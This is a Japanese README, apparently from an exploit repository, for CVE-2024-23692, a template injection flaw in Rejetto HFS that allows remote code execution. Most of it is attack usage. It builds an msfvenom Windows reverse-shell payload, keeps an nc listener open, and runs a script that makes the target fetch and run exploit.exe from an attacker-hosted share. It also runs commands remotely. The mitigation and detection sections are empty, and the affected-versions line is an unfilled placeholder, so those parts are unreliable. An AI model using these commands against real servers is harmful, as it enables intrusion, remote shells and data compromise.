
Rejetto HFS (HTTP File Server) は、ネットワークまたはインターネット上でのファイル共有を容易にするシンプルなWebファイルサーバーです。
Rejetto HFS(HTTPファイルサーバー)は、ネットワークやインターネット上でのファイル共有を容易にするシンプルなWebファイルサーバーです。その使いやすさとシンプルさにもかかわらず、重大な脆弱性(CVE-2024-23692)が発見され、サーバーが攻撃者の標的となっています。
CVE-2024-23692 は、Rejetto HFS で特定されたサーバーサイドテンプレートインジェクション(SSTI)の脆弱性です。この脆弱性により、攻撃者はサーバー上で悪意のあるテンプレートを注入・実行できます。悪用された場合、リモートコード実行につながり、サーバー全体とそのサーバーがホストするデータが侵害される可能性があります。
この脆弱性を悪用する攻撃者は、以下を行うことができます:
msfvenomで作成した悪意のあるバイナリを使用してシェルを取得します。
注:ncでリッスンしたままにしてください。
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
コマンドをリモートで実行します。
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
結果が表示されるまでにおよそ15秒かかる場合があります。
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Rejetto HFS の [最新の脆弱性バージョンをここに挿入] までのすべてのバージョンが、この脆弱性の影響を受けます。
CVE-2024-23692によるリスクを軽減するために、ユーザーは以下を行うことをお勧めします:
サーバーが侵害されたかどうかを判断するには、以下を確認してください:
さらなる支援とサポートについては、Rejetto HFSコミュニティフォーラムまたは公式サポートチャネルを参照してください。
このプロジェクトはMITライセンスの下でライセンスされています。詳細についてはLICENSEファイルを参照してください。